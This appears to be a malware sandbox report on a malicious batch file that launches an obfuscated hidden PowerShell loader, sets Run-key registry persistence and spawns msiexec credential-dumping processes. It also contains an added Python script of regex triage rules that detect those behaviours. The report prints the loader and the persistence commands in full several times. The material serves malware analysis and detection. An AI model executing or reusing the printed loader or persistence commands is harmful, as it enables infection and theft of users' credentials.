                Source: Process Memory Space: powershell.exe PID: 5576, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 6388, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: classification engine Classification label: mal100.troj.spyw.evad.winBAT@24/13@7/4
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_004148B6 FindResourceW,SizeofResource,LoadResource,LockResource
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\aspargessuppens.Bri
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5028:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1784:120:WilError_03
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2860:120:WilError_03
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6156:120:WilError_03
                Source: C:\Windows\SysWOW64\msiexec.exe Mutant created: \Sessions\1\BaseNamedObjects\Rmc-TXCR8B
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ctl2d2ua.rov.ps1
                Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rIMGTR657365756.bat" "
                Source: C:\Windows\SysWOW64\msiexec.exe System information queried: HandleInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5576
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6388
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\desktop.ini
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                Source: msiexec.exe, msiexec.exe, 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                Source: msiexec.exe, msiexec.exe, 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                Source: msiexec.exe, 00000008.00000002.4528323110.0000000023130000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                Source: msiexec.exe, msiexec.exe, 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                Source: msiexec.exe, msiexec.exe, 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                Source: msiexec.exe, msiexec.exe, 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                Source: msiexec.exe, 0000000E.00000002.2578323561.0000000004756000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: msiexec.exe, msiexec.exe, 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                Source: C:\Windows\SysWOW64\msiexec.exe Evasive API call chain: __getmainargs,DecisionNodes,exitgraph_15-33237
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Buttresslike Egenskabsvinduets Whirlmagee sunkne Tangibilities Skivgatterne Unpeacefully #>;$hypogeal='Byggemodnedes';<#grasping Pedestrianising Kardon #>;$Untroubledly=$Telegrammes+$host.UI;function Taborets($Boejer){If ($Untroubledly) {$Baljers++;}$Sirenize=$Abintestate+$Boejer.'Length'-$Baljers; for( $Furcated=4;$Furcated -lt $Sirenize;$Furcated+=5){$preidentification++;$Nedlgger+=$Boejer[$Furcated];$Fruehauf='Kludging';}$Nedlgger;}function Politiseres($Antiopelmous){ & ($Glassine) ($Antiopelmous);}$Furcatedrrefragability=Taborets 'UnmoM sphoLarrzEksai Udal knlBloda und/Magn ';$Furcatedrrefragability+=Taborets 'Besv5Tr c.gran0jam util(StroWSkadiskannHattd owloUrdswBu ssTils GrunNV,siTlan, Kand1Aftn0Zith. Bop0Turb;Over IntW TraiTougnE te6Temp4Aarg;e nf n ggxGalo6Lian4Roeg;Lol Drecr Resv Bi :Pent1Rose3 Ext1 kod. C f0Arma)H ma SubfGsulfeMinucStank BedoE sp/ S.a2E,he0 mac1Tilf0Pine0Bogt1Pent0 Til1Te e AfsF orki FrerGrafeKl sfI deoka mxUngd/Clod1Lady3.zil1Omri.o sm0Misk ';$Drikkevandsforsyninger=Taborets 'CamaublgeSCe teCahir P a-TeleAParegKomse OpsNTj,ntCent ';$Engleskarers=Taborets 'une hTurat yeltSnohpkinesd.li:hexa/Lagd/ PhlmLipai rneoUnovtSupetKil oRoupeTri,zDos,a orun TrieForblCec lR,deaFdni. 
HencLa.roRemamSter/SpurH HjeoFindv DoleMoridThervEm artradkconse TaatNeds.Renlr ruaM ltrSpor ';$Genhret=Taborets ' ppe>Emer ';$Glassine=Taborets 'AarsI Ci,EPri.XKard ';$Balsameredes='Mangfoldigste';$Lizbeth='\aspargessuppens.Bri';Politiseres (Taborets ' Su,$KaragMareLBuboo FunbChoraKastlGray: PaltDeniHEmboIHypeO DvrNStilEF,avI ogpnGrame Pol= Su $ ForE GonNHjervBleg: GarA I opDisrpUnprDWho.ASt rTBl kA,krm+Inc $Na klFo,kiTan ZBattbRe.reArkatNdudhRavi ');Politiseres (Taborets 'alko$Se vGHaemLLuftOOralB RopaN melOpda:UncoS S.laA,latFlosE obsLCacqL lunI Ci t uthB RedyUnseEClosRBrauNTeksede rSNrin=Shr $RedbEopgrnT,buGPrivLSu aeS mvS HalkKabaa VenrS teeB nkRSte.s,pip.StndSForsP hrelHjeri undTHulk(Haar$Surag somE alfNRavgHCinnRC nte ogtBrne)Hand ');Politiseres (Taborets ' Ove[StriNAnkeePersTKono.LillS StaEeksprs nhvInkpiSygeCInv E epap.urfOSubtI,nianJahvtPse.mUnexaThe NTelea alGArgue PlaRErgo]Sate:Dist: limS.asteGydeCCoppU enRFa iiTildTSkr Y astp Enfr NedOd mptRipeO indCNon,oAutolAvne G.aa=Nona Regr[RefeNHypeEStraTgly .Ta.lsBnkbE Pr.C S eUc,mprTamuiAnthtEnciYStrap F.nr uzOSekst IsooMvreCH anOAbefLIsocTnis,YCyanpRetteL,mi]S ir:Nonc: IndTHvirL NedSMoon1Pleb2D nk ');$Engleskarers=$Satellitbyernes[0];$Faglrereksaminernes=(Taborets 'Koll$LejngMo oL KetoPlatb KreaWatelH dr:Oretr MedEBedyG To eInteLSperMVelusNonss Blii InsgDatasChecTO on=UnquNCowaeGelaWClay-TopfO ,rob BijJ areERareCKraktHiml SheeSCa iyexanScoupTJollePylrmDeko.T leN rase .igtChin.seglWforhe nneb ydrCUrfjlDil IUbndE aponKvilTKalv ');Politiseres ($Faglrereksaminernes);Politiseres (Taborets 'D lt$Fnisr Mile Vi,gParteSpaal m,dm LepsDiffs taiForlg onfsCarrtSkjt. UndH.take LnnaDan dPerfePapfrDeo
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Buttresslike Egenskabsvinduets Whirlmagee sunkne Tangibilities Skivgatterne Unpeacefully #>;$hypogeal='Byggemodnedes';<#grasping Pedestrianising Kardon #>;$Untroubledly=$Telegrammes+$host.UI;function Taborets($Boejer){If ($Untroubledly) {$Baljers++;}$Sirenize=$Abintestate+$Boejer.'Length'-$Baljers; for( $Furcated=4;$Furcated -lt $Sirenize;$Furcated+=5){$preidentification++;$Nedlgger+=$Boejer[$Furcated];$Fruehauf='Kludging';}$Nedlgger;}function Politiseres($Antiopelmous){ & ($Glassine) ($Antiopelmous);}$Furcatedrrefragability=Taborets 'UnmoM sphoLarrzEksai Udal knlBloda und/Magn ';$Furcatedrrefragability+=Taborets 'Besv5Tr c.gran0jam util(StroWSkadiskannHattd owloUrdswBu ssTils GrunNV,siTlan, Kand1Aftn0Zith. Bop0Turb;Over IntW TraiTougnE te6Temp4Aarg;e nf n ggxGalo6Lian4Roeg;Lol Drecr Resv Bi :Pent1Rose3 Ext1 kod. C f0Arma)H ma SubfGsulfeMinucStank BedoE sp/ S.a2E,he0 mac1Tilf0Pine0Bogt1Pent0 Til1Te e AfsF orki FrerGrafeKl sfI deoka mxUngd/Clod1Lady3.zil1Omri.o sm0Misk ';$Drikkevandsforsyninger=Taborets 'CamaublgeSCe teCahir P a-TeleAParegKomse OpsNTj,ntCent ';$Engleskarers=Taborets 'une hTurat yeltSnohpkinesd.li:hexa/Lagd/ PhlmLipai rneoUnovtSupetKil oRoupeTri,zDos,a orun TrieForblCec lR,deaFdni. 
HencLa.roRemamSter/SpurH HjeoFindv DoleMoridThervEm artradkconse TaatNeds.Renlr ruaM ltrSpor ';$Genhret=Taborets ' ppe>Emer ';$Glassine=Taborets 'AarsI Ci,EPri.XKard ';$Balsameredes='Mangfoldigste';$Lizbeth='\aspargessuppens.Bri';Politiseres (Taborets ' Su,$KaragMareLBuboo FunbChoraKastlGray: PaltDeniHEmboIHypeO DvrNStilEF,avI ogpnGrame Pol= Su $ ForE GonNHjervBleg: GarA I opDisrpUnprDWho.ASt rTBl kA,krm+Inc $Na klFo,kiTan ZBattbRe.reArkatNdudhRavi ');Politiseres (Taborets 'alko$Se vGHaemLLuftOOralB RopaN melOpda:UncoS S.laA,latFlosE obsLCacqL lunI Ci t uthB RedyUnseEClosRBrauNTeksede rSNrin=Shr $RedbEopgrnT,buGPrivLSu aeS mvS HalkKabaa VenrS teeB nkRSte.s,pip.StndSForsP hrelHjeri undTHulk(Haar$Surag somE alfNRavgHCinnRC nte ogtBrne)Hand ');Politiseres (Taborets ' Ove[StriNAnkeePersTKono.LillS StaEeksprs nhvInkpiSygeCInv E epap.urfOSubtI,nianJahvtPse.mUnexaThe NTelea alGArgue PlaRErgo]Sate:Dist: limS.asteGydeCCoppU enRFa iiTildTSkr Y astp Enfr NedOd mptRipeO indCNon,oAutolAvne G.aa=Nona Regr[RefeNHypeEStraTgly .Ta.lsBnkbE Pr.C S eUc,mprTamuiAnthtEnciYStrap F.nr uzOSekst IsooMvreCH anOAbefLIsocTnis,YCyanpRetteL,mi]S ir:Nonc: IndTHvirL NedSMoon1Pleb2D nk ');$Engleskarers=$Satellitbyernes[0];$Faglrereksaminernes=(Taborets 'Koll$LejngMo oL KetoPlatb KreaWatelH dr:Oretr MedEBedyG To eInteLSperMVelusNonss Blii InsgDatasChecTO on=UnquNCowaeGelaWClay-TopfO ,rob BijJ areERareCKraktHiml SheeSCa iyexanScoupTJollePylrmDeko.T leN rase .igtChin.seglWforhe nneb ydrCUrfjlDil IUbndE aponKvilTKalv ');Politiseres ($Faglrereksaminernes);Politiseres (Taborets 'D lt$Fnisr Mile Vi,gParteSpaal m,dm LepsDiffs taiForlg onfsCarrtSkjt. UndH.tak
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
                Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Aversi" /t REG_EXPAND_SZ /d "%Afgrnsningsproblemer% -windowstyle 1 $Predestinationism=(gp -Path 'HKCU:\Software\hovedparts\').Bagateller;%Afgrnsningsproblemer% ($Predestinationism)"
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Aversi" /t REG_EXPAND_SZ /d "%Afgrnsningsproblemer% -windowstyle 1 $Predestinationism=(gp -Path 'HKCU:\Software\hovedparts\').Bagateller;%Afgrnsningsproblemer% ($Predestinationism)"
                Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qalgwws"
                Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\avqzpodslp"
                Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kxvkpyvlhxpkj"
                Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kxvkpyvlhxpkj"
                Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kxvkpyvlhxpkj"
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Buttresslike Egenskabsvinduets Whirlmagee sunkne Tangibilities Skivgatterne Unpeacefully #>;$hypogeal='Byggemodnedes';<#grasping Pedestrianising Kardon #>;$Untroubledly=$Telegrammes+$host.UI;function Taborets($Boejer){If ($Untroubledly) {$Baljers++;}$Sirenize=$Abintestate+$Boejer.'Length'-$Baljers; for( $Furcated=4;$Furcated -lt $Sirenize;$Furcated+=5){$preidentification++;$Nedlgger+=$Boejer[$Furcated];$Fruehauf='Kludging';}$Nedlgger;}function Politiseres($Antiopelmous){ & ($Glassine) ($Antiopelmous);}$Furcatedrrefragability=Taborets 'UnmoM sphoLarrzEksai Udal knlBloda und/Magn ';$Furcatedrrefragability+=Taborets 'Besv5Tr c.gran0jam util(StroWSkadiskannHattd owloUrdswBu ssTils GrunNV,siTlan, Kand1Aftn0Zith. Bop0Turb;Over IntW TraiTougnE te6Temp4Aarg;e nf n ggxGalo6Lian4Roeg;Lol Drecr Resv Bi :Pent1Rose3 Ext1 kod. C f0Arma)H ma SubfGsulfeMinucStank BedoE sp/ S.a2E,he0 mac1Tilf0Pine0Bogt1Pent0 Til1Te e AfsF orki FrerGrafeKl sfI deoka mxUngd/Clod1Lady3.zil1Omri.o sm0Misk ';$Drikkevandsforsyninger=Taborets 'CamaublgeSCe teCahir P a-TeleAParegKomse OpsNTj,ntCent ';$Engleskarers=Taborets 'une hTurat yeltSnohpkinesd.li:hexa/Lagd/ PhlmLipai rneoUnovtSupetKil oRoupeTri,zDos,a orun TrieForblCec lR,deaFdni. 
HencLa.roRemamSter/SpurH HjeoFindv DoleMoridThervEm artradkconse TaatNeds.Renlr ruaM ltrSpor ';$Genhret=Taborets ' ppe>Emer ';$Glassine=Taborets 'AarsI Ci,EPri.XKard ';$Balsameredes='Mangfoldigste';$Lizbeth='\aspargessuppens.Bri';Politiseres (Taborets ' Su,$KaragMareLBuboo FunbChoraKastlGray: PaltDeniHEmboIHypeO DvrNStilEF,avI ogpnGrame Pol= Su $ ForE GonNHjervBleg: GarA I opDisrpUnprDWho.ASt rTBl kA,krm+Inc $Na klFo,kiTan ZBattbRe.reArkatNdudhRavi ');Politiseres (Taborets 'alko$Se vGHaemLLuftOOralB RopaN melOpda:UncoS S.laA,latFlosE obsLCacqL lunI Ci t uthB RedyUnseEClosRBrauNTeksede rSNrin=Shr $RedbEopgrnT,buGPrivLSu aeS mvS HalkKabaa VenrS teeB nkRSte.s,pip.StndSForsP hrelHjeri undTHulk(Haar$Surag somE alfNRavgHCinnRC nte ogtBrne)Hand ');Politiseres (Taborets ' Ove[StriNAnkeePersTKono.LillS StaEeksprs nhvInkpiSygeCInv E epap.urfOSubtI,nianJahvtPse.mUnexaThe NTelea alGArgue PlaRErgo]Sate:Dist: limS.asteGydeCCoppU enRFa iiTildTSkr Y astp Enfr NedOd mptRipeO indCNon,oAutolAvne G.aa=Nona Regr[RefeNHypeEStraTgly .Ta.lsBnkbE Pr.C S eUc,mprTamuiAnthtEnciYStrap F.nr uzOSekst IsooMvreCH anOAbefLIsocTnis,YCyanpRetteL,mi]S ir:Nonc: IndTHvirL NedSMoon1Pleb2D nk ');$Engleskarers=$Satellitbyernes[0];$Faglrereksaminernes=(Taborets 'Koll$LejngMo oL KetoPlatb KreaWatelH dr:Oretr MedEBedyG To eInteLSperMVelusNonss Blii InsgDatasChecTO on=UnquNCowaeGelaWClay-TopfO ,rob BijJ areERareCKraktHiml SheeSCa iyexanScoupTJollePylrmDeko.T leN rase .igtChin.seglWforhe nneb ydrCUrfjlDil IUbndE aponKvilTKalv ');Politiseres ($Faglrereksaminernes);Politiseres (Taborets 'D lt$Fnisr Mile Vi,gParteSpaal m,dm LepsDiffs taiForlg onfsCarrtSkjt. UndH.take LnnaDan dPerfePapfrDeo
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
                Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Aversi" /t REG_EXPAND_SZ /d "%Afgrnsningsproblemer% -windowstyle 1 $Predestinationism=(gp -Path 'HKCU:\Software\hovedparts\').Bagateller;%Afgrnsningsproblemer% ($Predestinationism)"
                Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qalgwws"
                Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\avqzpodslp"
                Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kxvkpyvlhxpkj"
                Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kxvkpyvlhxpkj"
                Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kxvkpyvlhxpkj"
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Aversi" /t REG_EXPAND_SZ /d "%Afgrnsningsproblemer% -windowstyle 1 $Predestinationism=(gp -Path 'HKCU:\Software\hovedparts\').Bagateller;%Afgrnsningsproblemer% ($Predestinationism)"
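The process tree above carries three behaviours worth turning into triage rules: a hidden-window PowerShell whose command line is padded with `<# ... #>` comment junk and calls its interpreter through a variable (`& ($Glassine) (...)`), a Run value of type REG_EXPAND_SZ that expands an environment variable and executes a payload read back from `HKCU:\Software\hovedparts` (`-windowstyle 1` is the numeric form of Hidden), and msiexec.exe spawning msiexec.exe with `/stext <file>`, the switch NirSoft recovery tools use to write recovered credentials to a text file, which matches the WebBrowserPassView and mail-credential signatures in this report. The Python below is an added example, not part of the Joe Sandbox report; the process-creation events it runs over are constructed to mirror the lines above plus two benign controls, and the rule names are made up.

```python
"""Added example: triage rules for the process tree in this report, run over
constructed process-creation events (not the sandbox's own data)."""

import re
from typing import Dict, List, Tuple

Event = Dict[str, str]   # keys: parent, image, cmdline

# Rule 1: REG ADD to a Run key whose data expands an environment variable and
# pulls the real payload out of another HKCU key with gp / Get-ItemProperty.
REG_ADD = re.compile(r"\bREG\s+ADD\b", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run\b", re.I)
REG_PAYLOAD = re.compile(r"%[^%]+%.*-windowstyle.*\b(gp|Get-ItemProperty)\b.*HKCU:", re.I | re.S)

# Rule 2: a process spawning a copy of itself with the NirSoft "/stext <file>"
# switch, the credential-dump pattern Remcos uses inside its host process.
STEXT = re.compile(r'\s/stext\s+"?[^\s"]+', re.I)

# Rule 3: hidden-window PowerShell, at least two <# #> junk comments, and the
# interpreter invoked through a variable, e.g. `& ($Glassine) ($x)`.
PS_JUNK_COMMENT = re.compile(r"<#.*?#>", re.S)
PS_INDIRECT_CALL = re.compile(r"&\s*\(\$\w+\)\s*\(", re.S)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def triage(events: List[Event]) -> List[Tuple[str, str]]:
    """Return (rule_name, image) for every event that matches a rule."""
    hits: List[Tuple[str, str]] = []
    for ev in events:
        image, parent, cmd = basename(ev["image"]), basename(ev["parent"]), ev["cmdline"]
        if image in ("reg.exe", "cmd.exe") and REG_ADD.search(cmd) \
                and RUN_KEY.search(cmd) and REG_PAYLOAD.search(cmd):
            hits.append(("run_key_registry_payload", ev["image"]))
        if image == "msiexec.exe" and parent == "msiexec.exe" and STEXT.search(cmd):
            hits.append(("msiexec_nirsoft_stext_child", ev["image"]))
        if image == "powershell.exe" and "-windowstyle hidden" in cmd.lower() \
                and len(PS_JUNK_COMMENT.findall(cmd)) >= 2 and PS_INDIRECT_CALL.search(cmd):
            hits.append(("powershell_junk_comment_indirect_call", ev["image"]))
    return hits


# Constructed events modelled on the report's process-creation lines.
SAMPLE_EVENTS: List[Event] = [
    {   # GuLoader stage 1 as launched by the .bat (junk words shortened)
        "parent": r"C:\Windows\System32\cmd.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": "powershell.exe -windowstyle hidden \" <#Buttresslike Egenskabsvinduets #>;"
                   "$hypogeal='Byggemodnedes';<#grasping Pedestrianising #>;"
                   "function Politiseres($a){ & ($Glassine) ($a);}$Glassine='IEX';\"",
    },
    {   # Run-key persistence whose payload lives under HKCU\Software\hovedparts
        "parent": r"C:\Windows\SysWOW64\cmd.exe",
        "image": r"C:\Windows\SysWOW64\reg.exe",
        "cmdline": r"""REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Aversi" /t REG_EXPAND_SZ """
                   r"""/d "%Afgrnsningsproblemer% -windowstyle 1 $P=(gp -Path 'HKCU:\Software\hovedparts\').Bagateller;"""
                   '%Afgrnsningsproblemer% ($P)"',
    },
    {   # Remcos child: NirSoft recovery module writing to a temp file
        "parent": r"C:\Windows\SysWOW64\msiexec.exe",
        "image": r"C:\Windows\SysWOW64\msiexec.exe",
        "cmdline": r'C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qalgwws"',
    },
    {   # benign control: an ordinary MSI install
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\msiexec.exe",
        "cmdline": r'msiexec.exe /i "C:\Users\user\Downloads\setup.msi" /qn',
    },
    {   # benign control: an interactive one-liner
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": "powershell.exe -NoProfile -Command Get-Process",
    },
]

if __name__ == "__main__":
    for rule, image in triage(SAMPLE_EVENTS):
        print(f"{rule}: {image}")
```

Rule 2 keys on the parent/child relationship rather than on the msiexec.exe path, because the injected host is a legitimate, signed binary; only the self-spawn with `/stext` is unusual. Rule 1 deliberately ignores the value name (`Aversi`) and the environment-variable name, both of which are randomised per build.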
                Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: policymanager.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp110_win.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskflowdataengine.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cdp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: umpdc.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dsreg.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
